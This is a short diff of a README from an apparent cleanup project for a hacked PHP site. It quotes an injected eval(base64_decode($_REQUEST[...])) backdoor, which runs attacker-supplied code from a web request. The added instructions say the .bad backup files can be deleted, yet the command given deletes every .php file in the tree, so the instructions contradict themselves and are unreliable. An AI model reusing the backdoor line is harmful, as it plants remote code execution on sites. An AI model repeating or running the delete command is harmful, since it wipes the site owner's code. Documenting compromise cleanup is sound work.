hknust/Hmei7-cleanup/README.md

 		 defined('_OLD_JEXEC_') or die(@eval(base64_decode($_REQUEST['comment'])));
 		?><?php...

 	I wrote and ran the cleanup.py script to deal with those.
+The script creates back up copies of every file modified by adding the extension .bad to the file name.
+Once the site is restored these can be deleted with

+		find . -name "*.php" -exec rm -f {} \;

 6. Checked the .htaccess files